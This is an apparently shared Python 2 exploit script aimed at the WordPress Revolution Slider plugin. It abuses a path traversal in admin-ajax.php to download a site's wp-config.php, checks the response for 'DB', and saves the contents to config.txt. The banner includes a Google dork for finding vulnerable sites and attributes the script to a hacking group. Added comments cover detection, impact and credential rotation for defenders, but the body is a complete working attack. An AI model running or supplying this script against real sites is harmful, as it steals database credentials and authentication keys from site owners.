Xyb3r-D3vil

Revslider Config Exploiter [Python]

Feb 1st, 2016
#!/usr/bin/python
# Python 2 script (print statements, urllib2). Given one site URL it requests
# /wp-admin/admin-ajax.php with action=revslider_show_image and
# img=../wp-config.php, then saves whatever the server returns to config.txt
# in the current working directory. No cookies or credentials are sent.
#
# Defender notes:
# - Detection: look in web-server / WAF logs for requests to
#   /wp-admin/admin-ajax.php whose query string carries
#   action=revslider_show_image together with an img value containing "../"
#   (here ../wp-config.php).
# - Impact: wp-config.php holds the WordPress database credentials and the
#   authentication keys/salts. If a site ever answered such a request with that
#   file, treat those values as exposed: update or remove the affected plugin,
#   then rotate the database password and the keys/salts.

# Only sys, time, urllib2 and requests are used below; the other imports
# (urllib, os, re, subprocess, Thread, Popen/PIPE, httplib, socket) are unused.
import urllib2,urllib,os,sys,re,subprocess
import requests as requests
from threading import Thread
import time
from subprocess import Popen, PIPE
import httplib,socket
# Banner printed on every run, before the arguments are checked.
print """
############################################################
# ____ __ __ _ ____ ____ ____ __ _ ____ #
# ( _ \ / \ ( ( \( \ ( _ \( __)( ( \(__ ) #
# ) _ (( O )/ / ) D ( ) _ ( ) _) / / / _/ #
# (____/ \__/ \_)__)(____/ (____/(____)\_)__)(____) #
# Revslider Config Exploiter #
# Shared By Xyb3r D3vil - PakXploiters #
# Google Dork : inurl:/wp-content/plugins/revlisder #
# Facebook : https://www.facebook.com/XybEr.D3vil #
# #
###########################################################
"""

# Exactly one argument (the site base URL) is required; otherwise the usage
# line goes to stderr and the script exits with status 1.
if len(sys.argv)!=2:
    sys.stderr.write('[+]~ Usage : '+sys.argv[0]+' http://example.com/path \n ')
    sys.exit(1)

target = sys.argv[1]

# Prefix the scheme when the argument does not contain the substring 'http://'.
if 'http://' not in target:
    target= 'http://'+target

# Echoes the argument as typed, not the normalised `target`.
print'[#] Target : ' + sys.argv[1]

# The same URL is fetched twice: once with urllib2 (its body is read into
# `html`) and once with requests, whose response `r` is never used afterwards.
# On the server side this shows up as two identical GET requests per run.
response = urllib2.urlopen(target+'/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php')
r = requests.get(target+'/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php')
html = response.read()

# This message is printed after the requests above have already been made.
print "[+] Checking Target if Vulnerable"

# The verdict is a bare substring test for "DB" in the response body.
# NOTE(review): presumably meant to match the DB_* constants in wp-config.php;
# any other response containing "DB" passes too, so neither verdict is proof
# of the site's patch state - confirm against the installed plugin version.
if "DB" in html:
    print "[+] Target is Vulnerable"

else:
    print "[+] Target not Vulnerable"

# Stop with status 1 when the substring test failed; nothing is written.
if "DB" not in html:
    sys.exit(1)

# Mode "w" overwrites any existing config.txt. The two sleeps (3 s and 4 s) only
# delay the progress messages. The handle is never closed explicitly.
# The output file contains the raw response, i.e. the exposed secrets in
# cleartext; after an authorised assessment it needs the same handling as any
# other credential dump (restricted access, secure deletion).
f = open("config.txt", "w")
time.sleep(3)
print "[+] Writing Config ..."
time.sleep(4)
f.write(html);
print "[+] Writing Config File Success"
print "[~] File output : config.txt"